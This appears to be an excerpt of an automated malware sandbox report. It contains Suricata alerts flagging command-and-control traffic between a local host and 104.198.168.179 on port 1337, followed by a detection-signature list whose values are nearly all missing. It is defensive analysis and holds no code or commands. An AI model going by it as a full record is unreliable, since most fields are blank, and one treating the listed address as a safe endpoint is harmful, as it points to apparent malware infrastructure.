2024-11-23T21:06:42.806358+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP |
2024-11-23T21:06:44.832141+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP |
2024-11-23T21:06:46.631866+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP |
2024-11-23T21:06:51.526216+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP |
2024-11-23T21:06:52.273835+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP |
2024-11-23T21:07:00.932230+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP |
2024-11-23T21:07:02.382413+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP |
2024-11-23T21:07:03.206395+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP |
2024-11-23T21:07:08.595658+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP |
2024-11-23T21:07:11.749735+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-11-23T21:03:35.005493+0100 | 2852874 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP |
2024-11-23T21:04:05.021284+0100 | 2852874 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP |
2024-11-23T21:04:35.036903+0100 | 2852874 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP |
2024-11-23T21:05:05.053094+0100 | 2852874 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP |
2024-11-23T21:05:35.069157+0100 | 2852874 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP |
2024-11-23T21:06:05.390110+0100 | 2852874 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP |
2024-11-23T21:06:35.084989+0100 | 2852874 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP |
2024-11-23T21:07:05.084425+0100 | 2852874 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-11-23T21:05:31.287399+0100 | 2853193 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP |
Click to jump to signature section
Show All Signature Results
AV Detection |
---|
Source: | Avira URL Cloud: |
Source: | Avira: | ||
Source: | Avira: |
Source: | Malware Configuration Extractor: |
Source: | ReversingLabs: | ||
Source: | ReversingLabs: |
Source: | ReversingLabs: |
Source: | Integrated Neural Analysis Model: |
Source: | Joe Sandbox ML: | ||
Source: | Joe Sandbox ML: |
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Source: | Static PE information: |
Source: | Binary string: | ||
Source: | Binary string: |
Networking |
---|
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: |
Source: | URLs: | ||
Source: | URLs: |
Source: | DNS query: |
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | TCP traffic: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | IP Address: |
Source: | ASN Name: |
Source: | JA3 fingerprint: | ||
Source: | JA3 fingerprint: |
Source: | DNS query: |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: |
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Source: | Code function: |